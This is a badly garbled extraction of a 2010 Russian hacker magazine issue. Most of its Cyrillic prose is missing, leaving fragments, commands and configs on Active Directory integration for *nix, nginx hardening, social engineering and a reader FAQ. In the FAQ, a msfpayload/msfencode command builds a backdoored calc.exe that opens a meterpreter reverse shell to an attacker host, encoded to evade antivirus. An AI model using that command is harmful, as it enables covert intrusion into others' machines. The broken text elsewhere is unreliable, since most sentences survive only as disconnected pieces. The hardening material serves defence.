Active Directory.
, , ,
. ,
- *nix-, . *nix
Windows
, AD.
, ,

: (Open)
(Enterprise). ,
, SSO-
Kerberos 5 NTLM. .
LO . .
,
. (,
, OpenSSH Putty). AD
, .
180 .
, Enterprise, -


Likewise Open

Likewise
Open
*nix- AD,
AD *nix-,

Gnome GConf, SELinux,


AppArmor sudo,
.
AD,
UID-GID (Likewise
Management Console),
. , Enterprise
,

Windows QAS

.
.
LO , , Red Hat
Enterprise Linux/Fedora/CentOS, Ubuntu,
openSUSE. Ubuntu :
$ sudo apt-get install likewise-open likewise-open-gui


Win2k8R2 *nix
Windows
*nix .
: SMB NFS. Windows,
*nix. FTP, HTTP, SSH
.. . Linux
, SMBFS CIFS, smbclient. Ubuntu
SMBFS, CentOS CIFS.
:
$ smbclient -L winsystem
*nix (Konqueror,
Nautilus) smb://
winsystem/.
, /
etc/fstab:
//winsystem/share /mnt/win cifs user,uid=500,rw,suid,username=user,password=pass 0 0
, , autofs. /etc/
auto.master :

winsystem -fstype=cifs,rw,noperm,username=user,password=pass ://winsystem/share
service autofs restart.
*nix SMB Samba (www.samba.org). /etc/
smb.conf, ,

(Nautilus, Konqueror, smb4k, XSMBrowser).
Win2k3R2, Microsoft
Services for Network File System (
Windows Services for Unix). Win2k8
File Server.
NFS- . NFS- :
> ServerManagerCmd -install FS-NFS-Services

NFS Sharing, .
NFS *nix (, . www.openbsd.
ru/docs/steps/nfs.html). /etc/exports
Windows
:
> mount \\192.168.1.12\share Z:

/smbmount /etc/auto.smb
/etc/auto.smb :


showmount -e IP_server .

WARNING

warning

*nix
AD, *nix
DNS NTP

.

QAS

, RPM DEB. , Ubuntu


:
$ sudo chmod +x ./LikewiseIdentityServiceOpen5.3.0.7766-linux-amd64-deb.sh
$ sudo sh ./LikewiseIdentityServiceOpen5.3.0.7766-linux-amd64-deb.sh

GUI:
$ sudo chmod +x ./LikewiseDomainJoinGui-5.3.0.7766-linux-x86_64-deb-installer
$ sudo sh ./LikewiseDomainJoinGui-5.3.0.7766-linux-x86_64-deb-installer

.
,
LO- ,
. *nix-
: lsassd (),
netlogond ( ), dcerpcd (RPC), lwiod (
SMB) eventlogd ( ).
OU, : *nix-, ( primary)
.
:
$ /opt/likewise/bin/domainjoin-cli join synack.ru admin

'--preview' ,
.
;
,
DOMAIN\\username.

QUEST AUTHENTICATION SERVICES


: QUEST SOFTWARE
WEB: QUEST-SOFTWARE.RU
: LINUX X86/X64, SOLARIS X86/X64/SPARC, AIX, HP-UX,
MAC OS X, HP-UX IA64/PA-RISC, IBM AIX X86/X64, SGI IRIX,
TRU64, XENSERVER, VMWARE ESX SERVER

QAS , AD, *nix-


. X 07 /138/ 10

Windows
Linux
, GPO, SSO- -Windows , Kerberos LDAP.
QAS
ARC4 128- , ,
56- DES,
Kerberos.
QAS *nix
/
, -.
AD,
, , , ,
. ,
.
NIS- NIS AD. ISO- (
).
, install.sh
preflight.sh .
QAS
.
*nix .
RPM/DEB client, SDK .

. vasd
,
. vasd vastool.
Windows
,
. ,
Win2k3R2, AD,
Unix- (UID, GID,
, ),
Schema Wizard,
Schema.

, .
: *nix-
OU.

INFO

info
SCCM 2007

, ][ 08.2009.

HTTP://WWW
links

Microsoft System
Center Operations
Manager 2007 :
microsoft.com/
systemcenter/en/us/
operations-manager.
aspx
OpsMgr 2007
Cross Platform
Extensions: blogs.
msdn.com/SCXplat,
technet.microsoft.com/
en-us/systemcenter/
scx/default.aspx
NFS
Linux: linux-nfs.org


NFS Win2k8R2
CENTRIFY DIRECTCONTROL
: CENTRIFY CORPORATION
WEB: CENTRIFY.COM
: LINUX X86/X64, MAC OS X, SOLARIS/
OPENSOLARIS X86/X64/SPARC, IBM AIX, SGI IRIX,
HP-UX, VMWARE ESX SERVER

Centrify DirectControl *nix ,


. ,

,
AD.
, .

,
225 ; centrify.com/
directcontrol.
Centrify DirectManage
Windows -. ,
Active Directory
Centrify Profile,


,
: , , UID,
. DirectControl ,


,

. . ,

.
. (
)
,
.
.
, , ,

.
,
.

.
*nix- , , .
DirectControl
,
GPO. *nix, Windows
, .
( , *nix-, primary-
..) ,
*nix-
AD, .

, Windows *nix
,
, ,
.
,

. z

j1m@synack.ru


NGINX WEB-
Web- nginx Web-. :

. , Apache, nginx
Web-, nginx
.
, , , nginx. ,
Web- .

,
, , -
Web-.

nginx
. ,
,
,
Web-, -.


Web-
nginx, src/
http/ngx_http_header_filter_module.c
:
static char ngx_http_server_string[] = "Server: nginx" CRLF;
static char ngx_http_server_full_string[] = "Server: " NGINX_VER CRLF;

- :
static char ngx_http_server_string[] = "Server: ][ Web Server" CRLF;
static char ngx_http_server_full_string[] = "Server: ][ Web Server" CRLF;


nginx-
nginx
Web- ,

. ,
,
.
,
.

:
# ./configure --without-http_autoindex_module --without-http_ssi_module
# make
# make install

nginx ( ) SSI (Server Side Includes)


Autoindex. ,
Web-,
configure '--help'.

NGINX.CONF
nginx .
, , -



nginx.conf "server_tokens
off". nginx
Web- , .


server :
# vi /etc/nginx/nginx.conf
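# Buffer size for reading the client request body
client_body_buffer_size 1K;
# Buffer size for reading the client request header
client_header_buffer_size 1k;
# Maximum allowed size of the client request body, as given in the
# Content-Length header; larger requests are rejected
client_max_body_size 1k;
# Number and size of buffers for reading large client request headers
large_client_header_buffers 2 1k;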

large_client_
header_buffers. ,
URI nginx ,


( x86 4 ).
, keep-alive. 1 URI
2 , DoS-.
:
# vi /etc/nginx/nginx.conf
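# Timeout for reading the client request body
client_body_timeout 10;
# Timeout for reading the client request header
client_header_timeout 10;
# Timeout after which a keep-alive connection is closed, and the
# value sent to the client in the Keep-Alive response header
keepalive_timeout 5 5;
# Timeout for transmitting a response to the client
send_timeout 10;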



Web- DoS :
# vi /etc/nginx/nginx.conf
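# Define a zone (slimits) that stores session states.
# A 1 MB zone holds about 32000 states; here it is 5 MB.
# (limit_zone was replaced by limit_conn_zone in nginx 1.1.8.)
limit_zone slimits $binary_remote_addr 5m;
# Maximum number of simultaneous connections per session,
# in effect per client IP
limit_conn slimits 5;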

HTTP, location. ,
Service unavailable 503.




Web-.
IP- 80
HEAD - ( ). ,
IP- ( location):
# vi /etc/nginx/nginx.conf
if ($host !~ ^(host.com|www.host.com)$ ) {
    return 444;
}


Web-

/ ,
RFC 2616 , Web- , . GET (
), HEAD ( ) POST (
),
server
:
# vi /etc/nginx/nginx.conf
if ($request_method !~ ^(GET|HEAD|POST)$ ) {
    return 444;
}


,
(user-agent). ,
, :

nginx
FreeBSD ,
return 403;
}
}

nginx
# vi /etc/nginx/nginx.conf
# Block download managers
if ($http_user_agent ~* LWP::Simple|BBBike|wget) {
    return 403;
}
# Block certain types of bots
if ($http_user_agent ~* msnbot|scrapbot) {
    return 403;
}

Referrer-
Web- ,
Referrer- ( -
, referrer
).
SEO-
-,
.

, , .
# vi /etc/nginx/nginx.conf
# server section
if ( $http_referer ~* (babes|forsale|girl|jewelry|love|nudit|organic|poker|porn|sex|teen) )
{
    return 403;
}


( ) .
, , ,
,
,
Web-, .
,
,
, ( ,
referrer-
). server nginx.conf
(host.com ):
# vi /etc/nginx/nginx.conf
location /images/ {
    valid_referers none blocked www.host.com host.com;
    if ($invalid_referer) {
        return 403;
    }
}

Nginx Web- .
Netcraft, 12
Web- , Rambler, Yandex,
Begun, Wordpress.com, Wrike, SourceForge.net, vkontakte.ru, megashara.com, Taba.ru. ,
select, epoll (Linux), kqueue (FreeBSD)
( 1
16 ), nginx , 10000 (
C10K). Rambler
2004 BSD- .




.
return 403 :
rewrite ^/images/uploads.*\.(gif|jpg|jpeg|png)$ http://www.host.com/banned.jpg last;

Web-, nginx
IP- .

. ,
URI :
# vi /etc/nginx/nginx.conf
location /uploads/ {
    # Allow access only from machines on the local network
    allow 192.168.1.0/24;
    # Deny everyone else
    deny all;
}

uploads

.
.
nginx-
(
admin):
# mkdir /etc/nginx/.htpasswd
# htpasswd -c /etc/nginx/.htpasswd/passwd admin

nginx.conf
:
# vi /etc/nginx/nginx.conf
location /admin/ {
    auth_basic "Restricted";
    auth_basic_user_file /etc/nginx/.htpasswd/passwd;
}

PHP

:
# htpasswd -s /etc/nginx/.htpasswd/passwd

SSL
,
, , ,
, . Nginx
SSL, .
SSL- nginx
. :
# cd /etc/nginx
# openssl genrsa -des3 -out server.key 1024
# openssl req -new -key server.key -out server.csr
# cp server.key server.key.org
# openssl rsa -in server.key.org -out server.key
# openssl x509 -req -days 365 -in server.csr \
-signkey server.key -out server.crt

nginx:
# vi /etc/nginx/nginx.conf
server {
server_name host.com;
listen 443;
ssl on;
ssl_certificate /etc/nginx/server.crt;
ssl_certificate_key /etc/nginx/server.key;
access_log /etc/nginx/logs/ssl.access.log;
error_log /etc/nginx/logs/ssl.error.log;
}

Web-:
# /etc/init.d/nginx reload

, Web-
. :
. /etc/sysctl.conf
:
# vi /etc/sysctl.conf
# Protection against smurf attacks
net.ipv4.icmp_echo_ignore_broadcasts = 1
# Protection against bogus ICMP error messages
net.ipv4.icmp_ignore_bogus_error_responses = 1
# Protection against SYN floods
net.ipv4.tcp_syncookies = 1
# Do not accept source-routed packets
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
# Reverse path filtering (protection against IP spoofing)
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
# This host is not a router
net.ipv4.ip_forward = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
# Enable ExecShield
kernel.exec-shield = 1
kernel.randomize_va_space = 1
# Widen the range of local ports
net.ipv4.ip_local_port_range = 2000 65000
# Increase the maximum TCP buffer sizes
net.ipv4.tcp_rmem = 4096 87380 8388608
net.ipv4.tcp_wmem = 4096 87380 8388608
net.core.rmem_max = 8388608
net.core.wmem_max = 8388608
net.core.netdev_max_backlog = 5000
net.ipv4.tcp_window_scaling = 1


Web-
Web-
, ,
Web-. /etc/
fstab :
/dev/sda5 /nginx ext4 defaults,nosuid,noexec,nodev 1 2

nginx chroot/jail-
*nix-
. Linux KVM, Xen, OpenVZ VServer, FreeBSD Jail, Solaris
Zones. ,
nginx chroot,
, .

# vi /etc/pf.conf
webserver_ip="1.1.1.1"
table <abuse> persist
block in quick from <abuse>
pass in on $ext_if proto tcp to $webserver_ip \
port www flags S/SA keep state \
(max-src-conn 100, max-src-conn-rate 15/60, \
overload <abuse> flush)


(15 ) 100.

PHP
nginx PHP, .
/etc/php/php.ini
:


SELinux nginx

,
SELinux AppArmor. , Web-.
nginx,
SELinuxNginx (http://sf.net/projects/selinuxnginx/) SELinux, .
# tar -zxvf se-ngix_1_0_10.tar.gz
# cd se-ngix_1_0_10/nginx
# make
# /usr/sbin/semodule -i nginx.pp


nginx ,
,
, .
, ,
80, 110 143- (, , nginx
IMAP/POP3-).



Web- IP- .
DoS- . Linux
iptables/netfilter- state:
# iptables -A INPUT -p tcp --dport 80 -i eth0 \
-m state --state NEW -m recent --set
# iptables -A INPUT -p tcp --dport 80 -i eth0 \
-m state --state NEW -m recent --update \
--seconds 60 --hitcount 15 -j DROP

IP 15. pf:

# vi /etc/php/php.ini
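; Disable dangerous functions
disable_functions = phpinfo, system, mail, exec
; Maximum execution time of each script, in seconds
max_execution_time = 30
; Maximum time each script may spend parsing request data,
; in seconds
max_input_time = 60
; Maximum amount of memory a script may consume
memory_limit = 8M
; Maximum size of POST data that PHP will accept
post_max_size = 8M
; Maximum size of an uploaded file
upload_max_filesize = 2M
; Do not show PHP error messages to users
display_errors = Off
; Enable Safe Mode
safe_mode = On
; Enable SQL Safe Mode
sql.safe_mode = On
; Directory from which executables may be run in Safe Mode
safe_mode_exec_dir = ////
; Do not expose PHP in response headers
expose_php = Off
; Log errors
log_errors = On
; Do not open remote files
allow_url_fopen = Off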

, Web-. ,
. ,
, , nginx ,
,
.
Web-, ,
. ,
Web-. z


UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:

-, ,
, ,
,
e-mail, ICQ

,
, ,
.
.

: , ,
.
,
, .
.
: GoodGod

socialware.ru;
Ayumi (spylabs.org);
,
.
!

ICQ
( primary e-mail)

ICQ :

e-mail (
][ 2009 , GoodGod);
ICQ, ;
ICQ, SEO
(
).
, , . -


: ,
, - .

, .
, () .
,
( , ,
). -
, ,
, :
,
200 .
,
. , ,
;
.
, ,
, , .
, - (
, ). ,
? ? , ... , . ,
.
ICQ Search, ,
(200
1400
).
,

.
,
. ,
: , , whois ,
( )
E-mail ICQ.
,
e-mail,
,
. ,
e-mail, UIN !
e-mail, ,
,
.


, ,
:
;
;
;
;
( ; ;
; ).
, , ,
.
,
,
.

.
ICQ . -,
( )

.
,
, ,
.
?

,
. . :
, ,

. .
, ,
,
.
,
;
, ,
, .
, .
, .

, , , ,
.
,
,
.

,
,
, ,
.



. ,
, , ( ,
),
,
( ).
. ,
.

,
. ,

. ,
( ) .
,
.
:
(: )
. : , (
)!
,

. , . , ( ).
5 ,
. ,
( ).
.
,
. ,
, , .
,

.

: 15-17 2010 ( )
100% ! ,
(). .
, . .
(). , 10
. ().

.
.

, (
), .
// HOSTS, DNS
DHCP- . , , e-mail,

, . ,


,
. ,
.

-,

.
, .
.

. .


,



. ,
.
, ,

.
, (
:)).
+ .
3. .
-
, ,
,
.
, ,
.

.
-,
. ,
.
, ,
,
-
, .
,
:).
.
4. .
(-, )
,
. ,


, , ,
, .exe
3D.
1. .

, ,
, ,
( , !),
- SMS.
,
(
). ,

. + .


2. .
,

. , , ( , ).

, , ,
,
.exe
3D.
,
,
. : ,
, -
,


: ( ),
-. ,
/ (
), , ,
. !
.
5. -
.
- : ( ).
().
(12 ) .
e-mail:

( ), e-mail,
, .
, , .

.

SHKOLNIK.RU
whois- e-mail,
. e-mail yandex.
ru, .

.

.
, .

HACKERSOFT.RU
, .
. ,
-. whois,
(mchost.ru) e-mail,
.
e-mail, : hackersoft.
ru@mail.ru,

, , , e-mail
. , , .
!
: ,

. , -
, , . , e-mail -

beta-testing@***.com. ,

.
.


. .
.

,
socialware.ru.


.
, e-mail
gmail.com.
-
hackersoft.ru@gmail.com. ,
.
.
, .
.

http://socialware.ru.

.

.


,
,
,
.
,
,
,
,
. :
, , .
( ) ,
: ,
,
WebMoney;
. ,

:
( ), ,
.

.
?
, , (
), , .

, ,
,
(
), ,
, , .


.
:
,
IT, ( Free Pascal
IDE); -108 (
);
, , :
(QIP,
VTalking), ICE Book Reader;
,
, :
Windows ( 2010 ),
;

(Alcohol, DVD Decrypter, Clone DVD, Nero)
+ Media Coder ;

(: .doc, .doc, );
WebStream,
.
WebStream 11 ,
;
: Opera, IE, FF; COMODO Internet
Security; Nokia.


()

,
, ,

.
, .
, ,
,
.
. , -


(phishing, . fishing , ) -, ,
. , .
(farming . .
,
) DNS- HOSTS
.
( ,
,
):
1. ;
2. ;
3. .
- ().
,
. ,

().

, .

/, :).
. ,

: ,
-
..
.

: ,

, ,
,
.
,

,
. .
, (
),
: ,
, batch/VBScript/JScript-
. ,

,
.
,
ICQ,
, ,
.
-
,

. ,
- . ,
-IT.

,
.
( , ). ,
,

(. ),
, ..
,
, ,
,
.
.
: , (
,
, ). , ,
,
( ).
, , .

,
. : 10-15 ?
.
, ,
,
. , ,
, -


.
, -
,
. ,
, ,
.
,
.
, , ,
,
.
,
. .
:
,
, .
,
.

,
, , .
, .
, , ,
.
, . , ,
,
,

.
,

:
1. .

,

.
2. ,
.
.
3. .
,
, .
(
).
4. .
.
.
,
.
.z


UNITS
ant

faq
united
@real.xakep.ru

Q: , ,

API-. MSDN,
. - IDA,
API-?

: , ,
API , ,
. ,
zynamics.com ida-msdn-
( : github.com/zynamics/msdnplugin-ida),
MSDN API , . ,
MSDN XML-.
msdncrawler (github.com/zynamics/msdn-crawler),
MSDN
XML- , API Windows (,
, ).
msdn-crawler
33984 (!) . msdn.xml,

IDB-, IDA.
IDAPython
ida_importer.py.
Q: Tor
. , , sslstrip, ,
.
- ?


A: 100% , -
. TorTunnel (www.
thoughtcrime.org/software/tortunnel)
TorScanner.

, ,
,
HTTPS HTTP:
torscanner host port / > dump.txt. ,

ExcludeNodes, Tor
.
, : , .
100% .
Q: SWF-
. ,
Flash.

A:
Flash-,
Flare OWASP's SWFIntruder.
,
,
, 9 10 Flashe,
ActionScript 3 Adobe Flex.
HP SWFScan (www.hp.com/go/swfscan).

, ActionScript 2.0
ActionScript 3.0.

Flash-. 60 ,
, XSS, (cross-domain privilege escalation)
. HP SWFScan ,
,
,

.
Q: -
Firefox Opera Chrome?

A:
Transmute (www.gettransmute.com),
-
. ,
(Firefox, Google Chrome, Opera, Internet Explorer
), -
. , Google Bookmarks, Delicious

.
Q: - JavaScript .
. ,
. ?

A: code.replace(/\/\*.+?\*\/|\/\/.*(?=[\n\r])/g, '').
, ,
:

Q:
?

A: ! ,
Gmail, ,
, Undo,
. ,
,
5 20 .
Outlook,
Exchange-
,
.
Q: RFID. ,

,
- . , RFID-
,
check-in -. ,
, RFID--

Python Visual Studio


1. var str = " /* not a real comment */ ";
2. var regex = /\/*.*/;
,
.
Q: Backtrack

. ?

A: Asus
/etc/X11/xinit/xinitrc:
xrandr --output HDMI-2 --off
xrandr --output VGA --off


(Firefox/Chrome);
LSP (Layered Service Provider),

DLL-
Winsock API.
:
(, Super Bank)
,
,

.

. ,
?

A: ,
!
.
RFID- . , ,
, .
-
. ,
www.dealextreme.com,
,
NoName RFID $40.
, -
. ,
-
. -


.
Q: ,
(
, ,
-)?

A: ,
, - .
:
API- ( ,
WinInet API);
BHO (Browser Helper Object)
DLL-,
Internet Explorer ;
(
API- FindWindow);
COM (Component Object Model) / OLE
(Object Linking and Embedding) ;

Q: ,
Excel-
(*.XLS).
, Python. ?

A: .
, , Pyxlreader (pyxlreader.
sourceforge.net),
COM,
Excel (
).

Excel.
Q: , iPhone?

RFID- $52
, RFID-
Paralax (www.parallax.
com),
/USB .
(
RFID Card Reader) $39,99
. :
RFID- $0,99.

Wi-Fi (
).
,
(
).
Q: Visual Studio
Python?

Q: . MAC-,
, ,
.
,
(, IP-).
.
?

A: , ,
, ,
IP-, .
! GPS ,
.
,
Wi-Fi (MAC ESSID)
(
, Google. ).
,

, .


.
,

Prey (preyproject.com).
: Windows, Mac
Linux,
Android. Prey
URL, ,
.
,


A: .
IronPython (
Python .Net)

Python- Visual Studio 2010.
,
IDE Microsoft,
Python,
( C#)
IntelliSense
.
Q:
Windows-
.

A: , exe .
, , , ,
Metaspoit'.
msfencode,
Metasploit,
backconnect:
./msfpayload windows/meterpreter/
reverse_tcp LHOST=< ip> R | ./
msfencode -t exe -x calc.exe -k -o
calc_backdoor.exe -e x86/shikata_
ga_nai -c 5

exe-
,
.

A: iPhone
Mach-O.

IPA- zip-, , -.
,
, ,
JailBrake (
).
gdb/
iphonedbg. AppStore : Mach-O. ,
,
Objective-C.
Apple
Smalltalk. ,
.
(>80%)
objc_msgSend().
,

zynamics Objective-C
helper (github.com/zynamics/objc-helperplugin-ida), IDA Pro
.
Q:
A-GPS (Assisted GPS).
,
. ,
GPS ?

A: , Assisted GPS
,
GPS, . ,
,

.
, GPS- : A-GPS
. , A-GPS
, ,
.z

>Multimedia
VideoInspector 2.2.4.123

>Misc
Prey 0.3.7
win7stack 0.80
GiMeSpace Free Edition 1.0.4.6
GetFoldersize 2.2.10
AllDup 3.0.2
RBTray 4.1
FLV Extract 1.6.0
Writespace 1.4
OnTopReplica 2.9.3
Ditto-cp 3.16.8
TeraCopy 2.12
Grow 2.0.3
PrintConductor 1.5
ViGlance OneStep V1
UltraSearch 1.3
1Password for Windows 1.0 beta
Clavier+ 10.6.1
PREDATOR 2.2.0
TouchFreeze 1.0.2

>System
Guru3D - Driver Sweeper
Explorer++ 1.1
Splunk 4.1.2
CrystalDiskMark 3.0.0d
LogLady 1.1
Sikuli IDE 0.10.1
RegFromApp 1.21
DOSBox 0.74
Soluto 1.0.721.0
VirtualBox 3.2 beta1
PC-Wizard 2010.1.94
Kiwi 1.4.2
FreeFileSync 3.7
HFSExplorer 0.21

>Net
FriendSea Presenter 1.2.0.6
NetSetMan 3.0.3
HomePipe
NetBalancer 1.0
TweetMyPC 3
Firewall Builder 4.0
inSSIDer
RFIDIOt 1.0a
Odysseus 2.0.0.84
Tinc 1.0.13
KpyM TelnetSSH Server 1.18b
USB to Ethernet 3.0.6

>Security
Webreak beta 0.1.1
MetaGooFil 1.4b
theHarvester 1.6
WebSlayer Beta
ProxyStrike 2.2
Sqlninja 0.2.5
Lansweeper 4.0
FUU 0.1beta
Malware Check Tool 1.0
Aircrack-ng 1.1
SIP Inspector 1.10
Blazentoo 0.1b
ThreatFactor NSIA
WhatWeb 0.4.3
Safe3 SQL Injector 6.2
ExploitMyUnion 2.1
iScanner 0.6
Yara 1.4
Harden SSLTLS beta
WebCruiser 2.3.2
FoxAnalysis 1.4.2
ChromeAnalysis 1.0.1
Watcher 1.4.0
Vera 0.1

Visual Studio
VisualSVN Server 2.1.2
VisualSVN 2.0.1
Visual Assist X 2010
TestDriven.NET 3.0 Personal
StyleCop 4.3.3.0
ReSharper 5.0
NUnit 2.5
GhostDoc 2.5
DPack 3.0.3 for Visual Studio 2010
CruiseControl.NET 1.5
CodeRush 2010.1.4

Visual Studio
Go To Definition 2.1
Triple Click 2.0
Hide Main Menu
ItalicCommentsFree 2.0
MoveToRegionVSX
Word Wrap with Auto-Indent 1.0
Regex Editor 1.5
GradientSelection 2.0
Selection Foreground 0.1
StructureAdornmentFree 1.9
Highlight all occurrences of selected
word 1.31
Find Results Highlighter 1.0
Visual Studio Background
Customizer 1.0
Visual Studio Color Theme Editor 1.0
IntelliSense Presenter 1.5

REAPER 3.52
mflow
RasterVect Free Edition 16.0
tinti 2.2.2
Taffy 0.5.0beta
VidCoder 0.41
Inkscape 0.47
Similarity 1.3
Free Audio Editor 2010

>>WINDOWS
>Development
Visual Studio 2010 Express
The Regex Coach 0.9.2
OllyDbg 2.0
Regulator 2.0
Regulazy 1.03
{smartassembly} 4.2
RJ TextEd 6.40

>System
ATI Catalyst 10.5
VMWare Workstation 7.1
XNeur+gXNeur 0.9.9
SystemRescueCd 1.5.4
Open vSwitch 1.0.0
VirtualBox 3.2.2
ZFS-Fuse 0.6.0
Linux Kernel 2.6.34
DOSBox 0.74
Ganeti 2.1.2
Memtest86+ 4.10
nVidia 195.36.24
YASMon 0.0.5
OpenAFS 1.4.12.1
ROXTerm 1.18.3
Wine 1.0.1
Wmc2d 2.03

>Games
The Battle for Wesnoth 1.8.2

>Net
Google Chrome 5.0.375.55
KTorrent 4.0
Midori 0.2.6
Pidgin 2.7.1
EiskaltDC++ 2.0.2
RTMPdump 2.2e
Mozilla Firefox 3.6.3
Dropbox 0.6.571
Mozilla Thunderbird 2.0.0.24
NetworkManager 0.8
Pino 0.2.10
Opera 10.10
gPodder 2.6
Konversation 1.2.3
GoldenPod 0.8.3
SIM IM 0.9.4.3
Xchat 2.8.8

>Security
LFT 3.1
Nufw 2.4.2
OpenScap 0.5.11
Suricata 0.9.1
Keychain 2.7.1
Whatweb 0.4.3
Joomla sqli sploiter
Column finder
Darkjumper 5.7
Iptables 1.4.8
Clamav 0.96.1
Metasploit Framework 3.4.0
Hashkill 0.2.0
Ctunnel 0.3
Graudit 1.6
Xplico 0.5.7
Sqlninja 0.2.5
iScanner 0.5
Complemento 0.7.6
Samhain 2.7.0
Authfail 1.1.7

Lightspark 0.4.0

>Server
Sipwitch 0.8.3
Cherokee Webserver 1.0.1
Adchpp 2.5
Kamailio 3.0.2
Radmind 1.13.0
Fapws3 0.5
Socks Server5 3.8.2
LFTP 4.0.8
RabbIT 4.6
Ziproxy 3.0.1
MySQL 5.1.47
Apache 2.2.15
BIND 9.7.0
CUPS 1.4.3
DHCP 4.1.1
OpenLDAP 2.4.22
OpenSSH 5.5
OpenVPN 2.1.1
Sendmail 8.14.4
Asterisk 1.6.2

>Devel
Akshell 0.2
Android NDK R4
Android SDK R6
Apache Rivet 2.0
Arcadia 0.8.1
Automake 1.11.1
Bviplus 0.9.4
db4o 8
Django 1.2
Execute Query 3.2.1
jMonkeyEngine3 SDK alpha
JRuby 1.5.0
Native Client SDK
Qt 4.6.2
Rubinius 1.0
Smalltalk 3.2
Spket IDE 1.6.18
xmlsec1 1.2.16
ADT 0.9.7

>>UNIX
>Desktop
Banshee 1.7.1
Cdrtools 3.0.0
DirSync Pro 1.3
DockBarX 0.39
Dynamic Window Manager 5.8
Emacs 23.2
Evince 2.30.1
FFmpeg 0.5.2
Fotoxx 10.4
F-Spot 0.6.2
KOffice 2.2
MC 4.7.2
MythTV 0.23
Parole 0.2.0.2
PeaZip 3.1
Sweet Home 3D 2.4
Xfce 4.6.2

Kaspersky CRYSTAL 9.0


ESET NOD32 4.2

07(138) 2010

LOTUS DOMINO
SKYPE

07 (138) 2010



: 2
10
.

. 107

. 52

. 26

. 110

AMAZON S3

WEB-

UNITS

HTTP:// WWW2

PASSWORDCARD

www.passwordcard.org PREZI
www.prezi.com
( b15DbaL) .
! , . ,
- ,
. . PasswordCard , -
. ,
.
-, ,
- , ,
.
, , ,
.
PasswordCard.

Microsoft , PowerPoint 2010 , . ,


- Prezi :). :
,

. ,
, , ,
, .
,
, ,
, , ,
:).


Javascript

JSCRAMBLER

RAPID7 ONLINE SCAN www.jscrambler.com


rapid7.com/freescan.jsp

Rapid7, , , Metasploit
. ,
Rapid7 NeXpose. ,
( ), ,
(--). ,
-
. ,
. , :

Reports.


Google I/O
: 2004
. , -
( Google).

, -, , , JavaScript, .
, ,
. , - JScrambler.
- , . , ,
.